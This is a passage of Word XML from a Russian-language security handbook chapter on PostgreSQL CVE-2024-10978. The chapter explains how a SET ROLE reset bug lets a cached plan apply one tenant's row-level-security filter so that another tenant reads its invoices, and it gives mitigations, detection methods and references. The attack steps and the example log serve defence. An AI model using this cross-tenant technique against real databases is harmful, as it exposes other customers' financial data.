          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET ROLE tenant_99</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app.tenant_id = '99'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В уязвимом PG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — CVE-2024-10978 баг в reset path сохраняет неверный role/user-id в plan-cache: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Effective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корректно переключается на tenant_99 (для авторизации новых operations).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Plan-cache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для same SQL содержит RLS-expanded expression от tenant_42.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Subsequent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исполняет cached plan с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_42's RLS filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — tenant_99 видит invoices tenant 42.</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(через diagnostic logging):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LOG:  execute &lt;unnamed&gt;: SELECT id, amount, paid_at, description FROM billing.invoices ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DETAIL:  Plan:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">         Seq Scan on invoices</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            Filter: ((tenant_id = (current_setting('app.tenant_id'))::int)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                     AND (paid_at &gt; (now() - '30 days'::interval)))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">         -- ↑ RLS expression captured при первом plan; current_setting evaluating dynamically,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">         --    но cached plan может иметь folded constant вместо expression вызова</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если RLS-policy expression была </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">constant-folded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в plan (для optimization), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">current_setting('app.tenant_id')::int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42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (значение на момент cache), и второй tenant видит invoices первого даже после изменения SET.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаг 3 (alternative path) — RESET ROLE leak</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CVE-2024-10978 specifically about </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RESET ROLE leaving incorrect user_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. После RESET ROLE определённые subsequent queries могут исполняться с stale role identifier — что для RLS-таблиц означает «никакая policy не применяется» (если stale ID == owner/superuser) или «policy применяется для wrong tenant».</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Cross-tenant invoice exfiltration: tenant 99 видит invoices tenant 42 (и наоборот). Severity критична для billing/financial data — direct compliance violation (GDPR/SOC2).</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auto_explain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: log с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> expression, который не matches current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/SET app.tenant_id.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Application logs: tenant видит «extra» invoices, обнаруживаются через customer complaints (классический pattern detection — пользователь жалуется на «not my invoice»).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одна query, разные rows-returned между sessions с разными roles.</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Технический mechanism тот же, что в 3.13.1 — баг в reset path SET ROLE / SET SESSION AUTHORIZATION в PG ≤ 17.0/16.4/15.8/14.13/13.16/12.20.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Из CVE advisory: *"Incorrect privilege assignment in PostgreSQL allows a less-privileged application user to view or change different rows from those intended. An attack requires the application to use SET ROLE, SET SESSION AUTHORIZATION, or an equivalent feature. The problem arises when an application query uses values from the user under attack."*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Тот же баг даёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">два разных outcome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Privilege bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.13.1): функция или операция, требующая высоких привилегий, выполняется под stale role-id, который их имеет.</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RLS bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.17.3): SELECT/UPDATE/DELETE применяет policy от stale role-id.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Защита та же — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">upgrade на patched PG-версию</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Workarounds (для непатченных) — те же, что в 3.17.1: connection-per-tenant или DISCARD ALL после RESET ROLE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Дополнительная mitigation для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.17.3 specifically</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">session-level RLS variables вместо role-based</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Альтернативный pattern без SET ROLE:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Application всегда исполняет от одного role (application_user),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- но RLS policy filter по session-variable, не current_user.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POLICY tenant_invoices_v2 ON billing.invoices</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    USING (tenant_id = current_setting('app.tenant_id', true)::int);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Application code (без SET ROLE):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@asynccontextmanager</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def tenant_session(tenant_id: int):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    async with async_session_factory() as session:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        await session.execute(text(f"SET LOCAL app.tenant_id = '{tenant_id}'"))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        # ↑ SET LOCAL — scoped to current transaction, auto-reset</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        yield session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET LOCAL</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SET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) auto-resets at transaction-end, eliminating reset-path bug. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Это не полная защита</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — но снижает attack surface для CVE-2024-10978-specific reset path.</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 17.0, 16.4, 15.8, 14.13, 13.16, 12.20 (same as 3.17.1, both CVEs fixed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валидная tenant-role + application использует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per-request + connection pool.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SET ROLE per-request + RLS на user-data tables + plan cache enabled.</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 per PostgreSQL Project)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ноября 2024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 17.0, 16.4, 15.8, 14.13, 13.16, 12.20</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17.1, 16.5, 15.9, 14.14, 13.17, 12.21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Incorrect privilege assignment в SET ROLE reset path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Privilege escalation (3.13.1) + RLS bypass (3.17.3) — два аспекта одного бага</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per-request — стандартный multi-tenant pattern (см. 3.13.1 и 3.17.1). Тот же подход для billing/financial data with RLS — стандартная архитектура SaaS. Корректная работа возможна </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">только на patched PG-версиях</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или с workarounds (connection-per-tenant, SET LOCAL вместо SET ROLE).</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Behavioral</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: customer complaints о «not my data» — самый частый detection-vector. Application-level audit: log access patterns, compare expected tenant_id vs returned rows.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`auto_explain` log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: filter expressions не matching current session role/variables.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query-text с varying result-rows count between different sessions (indicator of plan-cache issue).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version check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: critical для ≤ 17.0/16.4/...</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Те же, что 3.17.1 и 3.13.1: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Major</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Уязвимая</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16.4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15.8</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14.13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13.16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12.20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 (EOL ветка)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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 SET ROLE / CVE-2024-10978</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">тот же CVE, parallel chapter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Cross-ref обязателен. Граница: 3.13.1 — privilege escalation; 3.17.3 — data exfiltration.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3.17.1 Subquery + plan-cache / CVE-2024-10976</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — связанный CVE того же batch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3.17.5 SECURITY DEFINER функции и RLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — alternative bypass без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parallel privilege escalation pattern.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 Хронология 2024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий контекст batch CVE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defence-in-depth.</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CVE-2024-10978 — https://www.postgresql.org/support/security/CVE-2024-10978/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17.1 Release Notes (Security Fixes) — https://www.postgresql.org/docs/release/17.1/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NIST NVD: CVE-2024-10978 — https://nvd.nist.gov/vuln/detail/CVE-2024-10978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«SET ROLE» — https://www.postgresql.org/docs/current/sql-set-role.html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«Row Security Policies» — https://www.postgresql.org/docs/current/ddl-rowsecurity.html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pganalyze blog: «PostgreSQL 17.1 security fixes» — https://pganalyze.com/blog/5mins-postgres-17-1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R8 (sources/research.md, строки 162–170)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3.13.1 (related chapter — same CVE, different attack-outcome)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
